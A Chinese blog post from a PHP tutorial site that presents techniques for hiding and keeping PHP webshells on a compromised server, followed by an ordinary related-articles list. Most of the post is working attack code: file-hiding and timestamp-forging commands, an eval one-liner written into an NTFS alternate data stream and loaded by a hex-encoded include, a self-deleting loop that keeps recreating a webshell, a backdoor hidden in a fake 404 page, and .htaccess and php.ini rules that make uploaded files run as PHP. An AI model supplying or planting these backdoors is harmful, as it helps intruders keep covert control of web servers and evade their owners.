PHP后门隐藏的一些技巧总结


Posted in PHP onNovember 04, 2020

前言

如果想让自己的Webshell留的更久一些,除了Webshell要免杀,还需要注意一些隐藏技巧,比如隐藏文件,修改时间属性,隐藏文件内容等。

1、隐藏文件

使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。

attrib +s +a +h +r shell.php //隐藏shell.php文件

2、修改文件时间属性

当你试图在一堆文件中隐藏自己新创建的文件,那么,除了创建一个迷惑性的文件名,还需要修改文件的修改日期。

//修改时间修改
Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12"
//访问时间修改
Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12"
//创建时间修改
Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"

使用命令获取文件属性

Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force

修改某个文件夹下所有文件的创建和修改时间

powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"

3、利用ADS隐藏文件内容

在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞:

echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg

这样子就生成了一个不可见的shell hidden.jpg,常规的文件管理器、type命令,dir命令、del命令发现都找不出那个hidden.jpg的。

利用include函数,将index.php:hidden.jpg进行hex编码,把这个ADS文件include进去,这样子就可以正常解析我们的一句话了。

<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>

4、不死马

不死马会删除自身,以进程的形式循环创建隐蔽的后门。

<?php
set_time_limit(0); 
ignore_user_abort(1); 
unlink(__FILE__); //删除自身
while(1)
{ 
 file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>'); //创建shell.php,这里最好用免杀的一句话
 sleep(10); //间隔时间
}
?>

处理方式最简单有效的办法,就是重启服务就可以删除webshell文件。

5、中间件后门

将编译好的so文件复制到modules文件夹,启动后门模块,重启Apache。当发送特定参数的字符串过去时,即可触发后门。

github项目地址:

https://github.com/VladRico/apache2_BackdoorMod

6、利用404页面隐藏后门

404页面主要用来提升用户体验,可用来隐藏后门文件。

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>

7、利用 .htaccess 文件构成PHP后门

一般.htaccess可以用来留后门和针对黑名单绕过,在上传目录创建.htaccess 文件写入,无需重启即可生效,上传png文件解析。

AddType application/x-httpd-php .png

另外,在.htaccess 加入php解析规则,把文件名包含1的解析成php,上传1.txt即可解析。

<FilesMatch "1"> 
SetHandler application/x-httpd-php 
</FilesMatch>

8、利用 php.ini 隐藏后门文件

php.ini 中可以指定在主文件执行前后自动解析的文件名称,常用于页面公共头部和尾部,也可以用来隐藏php后门。

;在PHP文档之前自动添加文件。
auto_prepend_file = "c:\tmp.txt"
;在PHP文档之后自动添加文件。
auto_prepend_file = "c:\tmp.txt"

需重启服务生效,访问任意一个php文件即可获取webshell。

总结

到此这篇关于PHP后门隐藏的一些技巧的文章就介绍到这了,更多相关PHP后门隐藏技巧内容请搜索三水点靠木以前的文章或继续浏览下面的相关文章希望大家以后多多支持三水点靠木!

PHP 相关文章推荐
利用递归把多维数组转为一维数组的函数
Oct 09 PHP
PHP 自定义错误处理函数的使用详解
May 10 PHP
div li的多行多列 无刷新分页示例代码
Oct 16 PHP
php中\r \r\n \t的区别示例介绍
Feb 08 PHP
Smarty模板学习笔记之Smarty简介
May 20 PHP
Yii框架上传图片用法总结
Mar 28 PHP
PHP模板引擎Smarty之配置文件在模板变量中的使用方法示例
Apr 11 PHP
PHP简单创建压缩图的方法
Aug 24 PHP
为何说PHP引用是个坑,要慎用
Apr 02 PHP
PHP验证类的封装与使用方法详解
Jan 10 PHP
PHP自动生成缩略图函数的源码示例
Mar 18 PHP
PHP安全之register_globals的on和off的区别
Jul 23 PHP
phpstudy2020搭建站点的实现示例
Oct 30 #PHP
解决PHPstudy Apache无法启动的问题【亲测有效】
Oct 30 #PHP
PhpStorm 2020.3:新增开箱即用的PHP 8属性(推荐)
Oct 30 #PHP
2020最新版 PhpStudy V8.1版本下载安装使用详解
Oct 30 #PHP
PHP fopen中文文件名乱码问题解决方案
Oct 28 #PHP
PHP dirname功能及原理实例解析
Oct 28 #PHP
基于ThinkPHP删除目录及目录文件函数
Oct 28 #PHP
You might like
PHP4 与 MySQL 数据库操作函数详解
2006/12/06 PHP
php 修改、增加xml结点属性的实现代码
2013/10/22 PHP
PHP中的替代语法简介
2014/08/22 PHP
解析WordPress中函数钩子hook的作用及基本用法
2015/12/22 PHP
PHP4和PHP5版本下解析XML文档的操作方法实例分析
2017/05/20 PHP
phpStudy配置多站点多域名和多端口的方法
2017/09/01 PHP
cnblogs中在闪存中屏蔽某人的实现代码
2010/11/14 Javascript
同一个网页中实现多个JavaScript特效的方法
2015/02/02 Javascript
js中unicode转码方法详解
2015/10/09 Javascript
jQuery on()方法绑定动态元素的点击事件无响应的解决办法
2016/07/07 Javascript
js重写方法的简单实现
2016/07/10 Javascript
jQuery Easyui使用(二)之可折叠面板动态加载无效果的解决方法
2016/08/17 Javascript
AngularJS表格样式简单设置方法示例
2017/03/03 Javascript
Angular2里获取(input file)上传文件的内容的方法
2017/09/05 Javascript
JS正则表达式完美实现身份证校验功能
2017/10/18 Javascript
原生js调用json方法总结
2018/02/22 Javascript
微信小程序实现循环动画效果
2018/07/16 Javascript
vue中使用better-scroll实现滑动效果及注意事项
2018/11/15 Javascript
微信小程序发送短信验证码完整实例
2019/01/07 Javascript
VSCode 配置uni-app的方法
2020/07/11 Javascript
vue组件实现移动端九宫格转盘抽奖
2020/10/16 Javascript
python 容器总结整理
2017/04/04 Python
对python 各种删除文件失败的处理方式分享
2018/04/24 Python
Python使用sklearn实现的各种回归算法示例
2019/07/04 Python
Python数据可视化 pyecharts实现各种统计图表过程详解
2019/08/15 Python
3种适用于Python的疯狂秘密武器及原因解析
2020/04/29 Python
Python爬虫自动化爬取b站实时弹幕实例方法
2021/01/26 Python
你正在寻找的CSS3 动画技术
2011/07/27 HTML / CSS
HTML高亮关键字的实现代码
2018/10/22 HTML / CSS
18-35岁旅游团的全球领导者:Contiki
2017/02/08 全球购物
一百多行代码实现react拖拽hooks
2021/03/23 Javascript
2014年人力资源工作总结
2014/11/19 职场文书
校友会致辞
2015/07/30 职场文书
2016年秋季趣味运动会开幕词
2016/03/04 职场文书
python - asyncio异步编程
2021/04/06 Python
Redis唯一ID生成器的实现
2022/07/07 Redis